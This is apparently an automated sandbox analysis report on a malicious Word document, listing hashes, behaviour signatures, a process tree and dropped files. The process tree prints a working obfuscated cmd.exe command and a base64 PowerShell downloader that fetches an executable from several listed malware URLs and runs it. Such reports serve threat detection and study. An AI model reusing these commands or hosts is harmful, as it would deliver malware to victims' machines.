Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
04-06-2024 02:28
General
-
Target
93634bb30afa7b46818ec9acc0b35930_JaffaCakes118.doc
-
Size
83KB
-
MD5
93634bb30afa7b46818ec9acc0b35930
-
SHA1
87be3a767b0d695d65347451d083368ac91d5770
-
SHA256
982721beff89e6e32a545753491e255ab77d814cb63495a78dad3c0572eb05d4
-
SHA512
38aa6069592eccc5516802edfdc106578d3bd9355318495f6c4b80fcefc089adf6045707398075a1c7af329c147ca52238128f1ac4c5f62e13a5ca0b05efc70a
-
SSDEEP
1536:fptJlmrJpmxlRw99NBd+aBU1dfaJKI+j:xte2dw99fYja0I+j
Malware Config
Extracted
http://djtosh.co.za/rrp
http://virginie.exstyle.fr/a
http://projettv.baudtanette.fr/FZ00c23Z
http://mujerproductivaradio.jacquelinezorrilla.com/O
http://esinvestmentinc.ezitsolutions.net/UIf
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 1 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\93634bb30afa7b46818ec9acc0b35930_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /V:^o ^ ^ /R" ^s^e^T ^ ^ ^Qud^b=AACAg^AA^IA^ACAg^A^A^I^AACAg^A^AI^AACA^g^AA^I^AACAgA^A^IA^ACAgAQ^fA0^HA7B^Aa^AMGA^0BQ^Y^A^MGA9^B^w^OAs^GAhBQZ^AI^H^AiBw^O^A^I^E^A^w^BgcA^QCAg^AQbA^U^GA0B^Q^S^A0C^AlBw^aA8^GA^2B^g^b^A^kEA7^A^QKAI^E^A^wB^gcA^QCAgAA^LA^4^EA^Z^Bwc^A^QCA^oA^QZ^A^wG^ApB^gR^A^Q^GAh^B^wb^A^wG^Au^BwdA8^G^AEB^g^L^A^gGAkBQW^A^QC^A^7BQeAI^HA0^B^weA^kC^A^k^Bw^U^Ao^HAkA^A^I^A4^GApBA^I^A^4^E^AZBwcA^QCAo^A^AaAMG^AhBQZAIHAvB^gZ^As^D^An^AQZAg^HAl^B^g^L^AcCAr^A^Q^b^AEF^A^D^B^AJ^AsCAn^A^A^XAcC^Ar^AwYAkGAs^Bg^Y^A^U^HAwBg^OA^Y^HAuBQZA^QCA^9A^g^QA^A^H^A^y^B^AJ^AsDAn^A^AOA^QD^A^3^A^w^JA^AC^A9A^A^IA^0GARBwQA^QC^A7A^Q^K^AcCA^A^Bw^J^A^gC^A^0B^Qa^A^w^GA^wBwUA4C^An^A^gZ^A^kEAVBw^LA^Q^H^Al^B^gb^A4CA^zBgbA8^G^Ap^BAdAUH^AsB^w^b^AM^HA^0^B^Q^a^A^oHA^lBgL^AMG^Au^B^QaAQHAuBQ^Z^A0G^A0^BwcA^U^GA^2BgbAkG^Az^B^Q^Z^A8CAv^A^g^OA^A^HA^0^B^Ad^Ag^G^A^A^B^w^T^A^8C^A^t^Bw^bAMGA^uA^QYAwG^A^sB^Q^a^AIHA^yB^w^b^AoHA^l^B^gbA^kG^As^B^QZA^UHA^x^Bw^Y^AE^G^A^qBg^LA8GApB^AZ^A^E^G^Ay^B^QY^A^YHA^p^BA^dAMGA^1^B^A^ZA8GAy^BAcAI^H^AlBg^a^A^UHAtBw^L^A8C^A6^A^Ac^AQ^HA^0B^A^aA^AEA^a^Bw^M^AI^D^A^jB^AMA^A^D^Aa^B^gRA8C^A^yBg^Z^A^4CAl^BAdAQH^AlBgbAE^G^A0BAZA^U^HA^hBgYA4C^A2^BA^d^A^Q^H^A^lB^gaA^8^G^AyBAcA8C^AvA^g^O^AA^HA^0B^A^d^AgG^A^A^B^Q^Y^A^8C^AyBg^Z^A^4C^A^l^B^A^b^Ak^H^A^0B^wcA^g^H^A^l^B^g^L^AU^G^A^pBgb^Ak^GAnB^gc^A^kG^A2^Bw^L^A^8CA6^A^AcA^Q^HA^0^BAa^A^A^EAw^Bgc^AIH^AvAQY^A^oH^Au^AwbA^M^G^Au^A^AaAM^H^AvB^AdA^o^GAk^B^w^LA8CA6AAc^AQHA^0BA^a^AcCA9A^AZAM^FA^6BAJA^s^DA^0B^gbAU^GA^p^B^Ab^AM^E^A^iBQZAcFA^u^A^A^dA^UG^AOB^A^I^A^QHAjB^Q^Z^AoG^A^iB^w^bA^0CA^3^BQ^ZA^4G^A9^AAa^A^QG^A^Z^B^AJ ^e^-^ l^le^hsre^w^op& f^Or /^l %^u ^IN ( ^ ^1^0^53 ^,^ ^ ^-1, ^ ^ 0) d^O ^sE^t ^Y4^Z=!^Y4^Z!!^Qud^b:~%^u, 1!&&^i^f %^u ^l^eQ ^0 C^a^lL %^Y4^Z:^~ -^10^5^4% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABZAGQAaAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AFMAZAA9ACcAaAB0AHQAcAA6AC8ALwBkAGoAdABvAHMAaAAuAGMAbwAuAHoAYQAvAHIAcgBwAEAAaAB0AHQAcAA6AC8ALwB2AGkAcgBnAGkAbgBpAGUALgBlAHgAcwB0AHkAbABlAC4AZgByAC8AYQBAAGgAdAB0AHAAOgAvAC8AcAByAG8AagBlAHQAdAB2AC4AYgBhAHUAZAB0AGEAbgBlAHQAdABlAC4AZgByAC8ARgBaADAAMABjADIAMwBaAEAAaAB0AHQAcAA6AC8ALwBtAHUAagBlAHIAcAByAG8AZAB1AGMAdABpAHYAYQByAGEAZABpAG8ALgBqAGEAYwBxAHUAZQBsAGkAbgBlAHoAbwByAHIAaQBsAGwAYQAuAGMAbwBtAC8ATwBAAGgAdAB0AHAAOgAvAC8AZQBzAGkAbgB2AGUAcwB0AG0AZQBuAHQAaQBuAGMALgBlAHoAaQB0AHMAbwBsAHUAdABpAG8AbgBzAC4AbgBlAHQALwBVAEkAZgAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAQwBRAG0AIAA9ACAAJwA3ADQAOAAnADsAJAByAHAAQgA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABDAFEAbQArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAcwBZAE4AIABpAG4AIAAkAHoAUwBkACkAewB0AHIAeQB7ACQAWQBkAGgALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAcwBZAE4ALAAgACQAcgBwAEIAKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAcgBwAEIAOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB